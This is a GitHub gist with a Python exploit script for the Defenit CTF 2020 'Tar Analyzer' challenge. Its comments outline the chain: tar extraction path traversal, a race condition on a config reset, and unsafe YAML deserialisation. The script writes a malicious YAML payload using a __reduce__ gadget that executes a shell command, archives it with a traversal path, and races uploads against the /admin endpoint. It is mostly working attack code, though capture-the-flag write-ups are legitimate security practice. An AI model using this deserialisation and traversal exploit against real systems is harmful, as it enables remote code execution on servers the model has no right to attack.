Skip to content

Instantly share code, notes, and snippets.

@shpik-kr
Last active June 8, 2020 02:06
Show Gist options
  • Save shpik-kr/6e944a2b34c34a989c6a4066e0896b47 to your computer and use it in GitHub Desktop.
Save shpik-kr/6e944a2b34c34a989c6a4066e0896b47 to your computer and use it in GitHub Desktop.
Defenit CTF 2020 - Tar Analyzer
#!/usr/bin/python
import requests
import os
import threading
import yaml
import subprocess
'''
Vulnerabilities:
1. Directory Traversal + File upload: User can upload to the parent folder because of tarfile.tar's extractall.
2. Race Condition: When user access "/admin" endpoint, `config.yaml` initializes as default configure.
3. Remote Command Execution: And load that. `config = load(fp.read(), Loader=Loader)`.
Attack:
1. Upload config.yaml that causes RCE, like this(same pickle rce):
```
class exp(object):
def __reduce__(self):
return (subprocess.check_output,(['ls','-al'],))
data = yaml.dump({'allow_host':"blahblah", 'message':exp()})
```
2. Get flag by accessing "/admin" endpoint(Race Condition).
'''
url = "http://tar-analyzer.ctf.defenit.kr:8080"
admin_url = url + "/admin"
upload_url = url + "/analyze"
def initialize(ip):
class exp(object):
def __reduce__(self):
return (subprocess.check_output,(['ls','-al'],))
data = yaml.dump({'allow_host':ip, 'message':exp()})
with open("../../config.yaml","w") as f:
f.write(data)
os.system("tar -cvf exp.tar ../../config.yaml")
def do_trigger():
global trigger_yaml_url
r = requests.get(admin_url)
print(r.text)
def do_upload_yaml():
global upload_url
files = {
"file": open("exp.tar","rb")
}
r = requests.post(upload_url, files=files)
ip = "[here]"
initialize(ip)
for idx in range(10):
t = threading.Thread(target=do_upload_yaml,args=())
v = threading.Thread(target=do_trigger,args=())
t.start()
v.start()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment